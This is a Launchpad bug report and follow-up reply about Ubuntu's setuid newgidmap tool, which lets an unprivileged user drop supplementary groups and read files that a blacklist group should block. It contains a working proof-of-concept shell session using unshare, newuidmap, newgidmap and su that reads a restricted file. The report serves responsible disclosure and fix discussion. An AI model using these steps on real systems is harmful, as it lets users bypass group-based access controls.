[Bug 1729357] Re: unprivileged user can drop supplementary groups
Craig Furman
1729357 at bugs.launchpad.net
Fri Nov 17 16:18:03 UTC 2017
Thanks for replying Eric, but I'm having trouble reproducing what you've
posted. I can't write the gid map until I've written deny to
/prod/$pid/setgroups, not the other way around. There might be some
nuance I've missed.
Also, newgidmap will allow a user to map their own GID to 0 in the user
namespace, even when there is no entry for that user in /etc/subgid.
What if newgidmap wrote "deny" to /proc/$pid/setgroups unless the user
is whitelisted in some config file, probably separate from /etc/subgid,
as Stéphane suggested?
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https://bugs.launchpad.net/bugs/1729357
Title:
unprivileged user can drop supplementary groups
Status in shadow package in Ubuntu:
Confirmed
Bug description:
Distribution: Ubuntu 16.04.3 LTS
Kernel: 4.4.0-97-generic
uidmap package version: 1:4.2-3.1ubuntu5.3
The newgidmap setuid executable allows any user to write a single
mapping line to the gid_map of a process whose identity is the same as
the calling process, as long as that mapping line maps the process's
own GID outside of the user namespace to GID 0 inside the user
namespace.
Newgidmap will write the mapping regardless of the content of
/proc/$process_being_mapped/setgroups, which will initially contain
the string "allow". After this mapping is performed, and also after
the process' uid_map is written with newuidmap, the process in the
user namespace will be able to use the setgroups system call to drop
supplementary groups.
This is possible even if there is no entry for the user in
/etc/subgid, because no subordinate GIDs are actually being used.
This allows any user to circumvent the use of supplementary groups as
blacklists, e.g. for some file owned by root:blacklist with permission
bits 0604 (octal). Normally any process whose identity included the
group "blacklist" in its supplementary groups would not be able to
read that file. By performing this exploit using newgidmap, they can
drop all supplementary groups and read that file.
If newgidmap was not available, unprivileged users would not be able
to write a process's gid_map until writing "deny" to
/proc/$pid/setgroups. A fix for this might be for newgidmap to check
the content of /proc/$process_being_mapped/setgroups is "deny", but we
have not tried to patch this ourselves.
An example using 2 login shells for a user named "someone" on Ubuntu
Xenial, with the uidmap package installed:
Shell 1
someone at ubuntu-xenial:~$ id
uid=1001(someone) gid=1001(someone) groups=1001(someone),1002(restricted)
someone at ubuntu-xenial:~$ ls -al /tmp/should_restrict
-rw----r-- 1 root restricted 8 Nov 1 12:23 /tmp/should_restrict
someone at ubuntu-xenial:~$ cat /tmp/should_restrict
cat: /tmp/should_restrict: Permission denied
someone at ubuntu-xenial:~$ unshare -U --setgroups allow #
/proc/self/setgroups already contains 'allow', but let's be explicit
nobody at ubuntu-xenial:~$ echo $$
1878
Shell 2
someone at ubuntu-xenial:~$ cat /etc/subuid
lxd:100000:65536
root:100000:65536
ubuntu:165536:65536
someone at ubuntu-xenial:~$ cat /etc/subgid
lxd:100000:65536
root:100000:65536
ubuntu:165536:65536
# There are no entries in /etc/sub{u,g}id for someone, but this
doesn't matter that much as subordinate IDs are not being requested.
someone at ubuntu-xenial:~$ newuidmap 1878 0 1001 1
someone at ubuntu-xenial:~$ newgidmap 1878 0 1001 1
Back to shell 1
nobody at ubuntu-xenial:~$ id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
# The presence of the "nogroup" supplementary group indicates that
some unmapped GIDs are present as supplementary GIDs. The kernel knows
that this process still has "restricted" in its supplementary groups,
so it can't read the restricted file yet.
nobody at ubuntu-xenial:~$ cat /tmp/should_restrict
cat: /tmp/should_restrict: Permission denied
# The process has gained CAP_SETGID in its user namespace by becoming
UID 0. /proc/$pid/setgroups contains "allow", so it can call
setgroups(2). By su-ing to root (itself, in the user namespace), it
can drop the supplementary groups. It can't read /root/.bashrc as that
file is owned by UID 0 in the initial user namespace, which creates
some distracting error output but doesn't matter in this case.
nobody at ubuntu-xenial:~$ su root
su: Authentication failure
(Ignored)
bash: /root/.bashrc: Permission denied
# Supplementary groups have been dropped
root at ubuntu-xenial:~# id
uid=0(root) gid=0(root) groups=0(root)
# It can read the restricted file
root at ubuntu-xenial:~# cat /tmp/should_restrict
content
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